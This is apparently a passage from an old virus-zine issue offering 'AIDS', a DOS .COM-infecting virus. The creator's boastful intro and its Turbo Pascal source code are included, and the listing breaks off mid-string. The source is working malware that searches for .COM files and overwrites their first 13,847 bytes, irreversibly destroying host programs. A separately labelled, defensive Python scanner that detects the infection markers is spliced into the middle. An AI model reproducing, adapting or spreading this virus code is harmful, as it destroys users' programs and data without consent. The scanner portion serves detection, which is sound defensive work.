Well well, here it is... I call it AIDS... It infects all COM files, but it is not perfect, so it will also change the date/time stamp to the current system time. Plus, any READ-ONLY attribute will ward this virus off; it doesn't like them! Anyway, this virus was originally named NUMBER ONE, and I modified the code so that it would fit my needs. The source code, which is included with this neato package, was written in Turbo Pascal 3.01a. Yeah, I know it's old, but it works. Well, I added a few things; you can experiment or mess around with it if you'd like to, and add any mods to it that you want, but change the name and give us some credit if you do. The file is approximately 13k long, and this extra memory will be added to the file it picks as host. If no more COM files are to be found, it picks a random value from 1-10, and if it happens to be the lucky number 7, AIDS will present a nice screen with lots of smiles, with a note telling the operator that their system is now screwed, I mean permanently.
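Both listings in this issue leave a marker in the host so that an already infected program is skipped on the next pass: the assembly virus above reads the first word of each .COM and compares it with 9090h (the "three NOPs" check in CHECK_IF_ILL), and the AIDS source below stores the string 'This File Has Been Infected By AIDS! HaHa!' at offset $80 of the host (MarkInfected at Cseg:$180). Those same markers, together with the side effect of the MASKE_EXE rename in the assembly virus (a .COM file that still begins with an MZ header), give a scanner something concrete to look for. The Python below is an added example and not code from the original issue or from its authors; the sample files it scans are constructed inline and are not real programs. One caveat worth knowing before relying on the marker: the AIDS source seeks to offset 0 before its BlockWrite, so an infected host has its first 13847 bytes overwritten rather than prepended, and the scanner can identify the file but nothing can recover the original program from it.

```python
"""Scan .COM files for the infection markers described on this page (added example)."""
import tempfile
from pathlib import Path

# Marker values are taken from the two listings on this page.
NOP_MARKER = b"\x90\x90"          # CHECK_IF_ILL: first word of the host == 9090h
AIDS_MARKER = b"This File Has Been Infected By AIDS! HaHa!"
AIDS_OFFSET = 0x80                # MarkInfected sits at Cseg:$180, i.e. file offset $80
EXE_MAGICS = (b"MZ", b"ZM")       # an .EXE renamed to .COM still carries its MZ header


def classify_com(data: bytes) -> list:
    """Return the indicators found in one .COM image (empty list = nothing found)."""
    found = []
    if data[:2] == NOP_MARKER:
        found.append("nop-marker")            # assembly virus: "three NOPs" flag
    if data[AIDS_OFFSET:AIDS_OFFSET + len(AIDS_MARKER)] == AIDS_MARKER:
        found.append("aids-marker")           # AIDS: warning string at $80
    if data[:2] in EXE_MAGICS:
        found.append("exe-renamed-to-com")    # side effect of the MASKE_EXE rename
    return found


def scan_directory(root) -> dict:
    """Walk root recursively, as both viruses do, and report every flagged *.COM."""
    root = Path(root)
    hits = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.upper() == ".COM":
            found = classify_com(path.read_bytes())
            if found:
                hits[path.relative_to(root).as_posix()] = found
    return hits


# Constructed sample files (not real programs); a few bytes exercise each check.
SAMPLES = {
    "CLEAN.COM": b"\xB4\x4C\xCD\x21",                              # mov ah,4Ch / int 21h
    "SUB/NOPPED.COM": b"\x90\x90\x90\xE9\x00\x00",                  # three NOPs, then a jmp
    "SUB/SICK.COM": b"\xE9\x00\x00".ljust(AIDS_OFFSET, b"\x00")
                    + AIDS_MARKER + b"\x00",                        # marker at offset $80
    "RENAMED.COM": b"MZ" + b"\x00" * 62,                            # .EXE header in a .COM
    "README.TXT": AIDS_MARKER,                                      # wrong extension: skipped
}


def demo() -> dict:
    """Write the samples into a temporary tree, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, blob in SAMPLES.items():
            target = Path(tmp, name)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(blob)
        return scan_directory(tmp)


if __name__ == "__main__":
    for name, indicators in demo().items():
        print(f"{name}: {', '.join(indicators)}")
```

The scanner only reads; it never rewrites attributes or timestamps, which is deliberate, since both viruses here rely on exactly those operations. The MZ check is the one to keep even after these particular markers are long gone: a .COM image that begins with an .EXE header is never a legitimate program.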
The encrypted files containing AIDS in their code are IRREVERSIBLY messed up. Oh well... Again, neither CPI nor the author of Number One or AIDS endorses this document and program for use in any illegal manner. Also, CPI and the author of Number One and AIDS are not responsible for any actions by the readers that may prove harmful in any way or another. This package was written for EDUCATIONAL purposes only!

{ Beginning of source code, Turbo Pascal 3.01a }

{C-} {U-} {I-}                    { No user break; I/O errors are returned via IOresult }

{ -- Constants --------------------------------------- }
Const
  VirusSize = 13847;                              { AIDS's code size }
  Warning : String[42]                            { Warning message }
    = 'This File Has Been Infected By AIDS! HaHa!';

{ -- Type declarations ------------------------------- }
Type
  DTARec = Record                                 { Data area for file search }
    DOSnext  : Array[1..21] of Byte;
    Attr     : Byte;
    Ftime, FDate, FLsize, FHsize : Integer;
    FullName : Array[1..13] of Char;
  End;
  Registers = Record                              { Register set used for file search }
    Case Byte of
      1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer);
      2 : (AL,AH,BL,BH,CL,CH,DL,DH : Byte);
  End;

{ -- Variables --------------------------------------- }
Var
  ProgramStart : Byte absolute Cseg:$100;         { Memory offset of program code }
  MarkInfected : String[42] absolute Cseg:$180;   { Infected marker }
  Reg          : Registers;                       { Register set }
  DTA          : DTARec;                          { Data area }
  Buffer       : Array[Byte] of Byte;             { Data buffer }
  TestID       : String[42];                      { To recognize infected files }
  UsePath      : String[66];                      { Path to search files }
  UsePathLenght: Byte absolute UsePath;           { Length of search path }
  Go           : File;                            { File to infect }
  B            : Byte;                            { Used }
  LoopVar      : Integer;                         { Will loop forever }

{ -- Program code ------------------------------------ }
Begin
  GetDir(0, UsePath);                             { get current directory }
  if Pos('\', UsePath) <> UsePathLenght then
    UsePath := UsePath + '\';
  UsePath := UsePath + '*.COM';                   { Define search mask }
  Reg.AH := $1A;                                  { Set data area }
  Reg.DS := Seg(DTA);
  Reg.DX := Ofs(DTA);
  MsDos(Reg);
  UsePath[Succ(UsePathLenght)] := #0;             { Path must end with #0 }
  Reg.AH := $4E;
  Reg.DS := Seg(UsePath);
  Reg.DX := Ofs(UsePath[1]);
  Reg.CX := $ff;                                  { Set attribute to find ALL files }
  MsDos(Reg);                                     { Find first matching entry }
  IF not Odd(Reg.Flags) Then                      { If a file was found then }
  Repeat
    UsePath := DTA.FullName;
    B := Pos(#0, UsePath);
    If B > 0 then Delete(UsePath, B, 255);        { Remove garbage }
    Assign(Go, UsePath);
    Reset(Go);
    If IOresult = 0 Then                          { If no IO error then }
    Begin
      BlockRead(Go, Buffer, 2);
      Move(Buffer[$80], TestID, 43);              { Test if file already ill (infected) }
      If TestID <> Warning Then                   { If not then ... }
      Begin
        Seek(Go, 0);                              { Mark file as infected and .. }
        MarkInfected := Warning;                  { Infect it }
        BlockWrite(Go, ProgramStart, Succ(VirusSize shr 7));
        Close(Go);
        Halt;                                     { .. and halt the program }
      End;
      Close(Go);
    End;
    { The file has already been infected, search next. }
    Reg.AH := $4F;
    Reg.DS := Seg(DTA);
    Reg.DX := Ofs(DTA);
    MsDos(Reg);
  Until Odd(Reg.Flags);                           { ... until no more files are found }
  LoopVar := Random(10);
  If LoopVar = 7 then
  begin
    Writeln(' ');                                 { Give a lot of smiles }
    Writeln('');
    Writeln(' ');
    Writeln(' ATTENTION: ');
    Writeln(' I have been elected to inform you that throughout your process of ');
    Writeln(' collecting and executing files, you have accidentally H